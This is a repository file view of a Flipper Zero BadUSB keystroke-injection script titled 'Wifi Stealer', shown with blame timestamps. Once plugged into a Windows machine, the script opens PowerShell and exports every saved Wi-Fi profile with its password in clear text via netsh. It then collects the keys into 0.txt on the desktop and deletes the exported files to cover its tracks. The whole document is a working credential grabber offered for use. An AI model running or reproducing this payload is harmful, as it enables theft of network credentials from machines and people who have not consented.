Flipper/BadUSB/Wifi-Stealer_ORG.txt

14 lines
583 B
Plaintext
Raw Normal View History

2022-07-17 04:41:15 +00:00
REM Title: Wifi Stealer
REM Author: 7h30th3r0n3
2022-07-19 18:07:59 +00:00
REM Target: Tested on Windows 7/8/10/11
2022-07-20 05:55:10 +00:00
REM Version: 1.0
2022-07-17 04:41:15 +00:00
REM Category: Grabber
2022-07-20 05:55:10 +00:00
REM Extracts the SSID and wifi shared key and puts them in a txt file named 0.txt on the desktop
2022-07-17 04:41:15 +00:00
GUI r
2022-07-19 18:07:59 +00:00
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING cd C:\Users\$env:UserName\Desktop; netsh wlan export profile key=clear; Select-String -Path WiFi-* -Pattern 'keyMaterial' | % { $_ -replace '</?keyMaterial>', ''} | % {$_ -replace "C:\\Users\\$env:UserName\\Desktop\\", ''} | % {$_ -replace '.xml:22:', ''} > 0.txt; del WiFi-*;exit
2022-07-17 04:41:15 +00:00
ENTER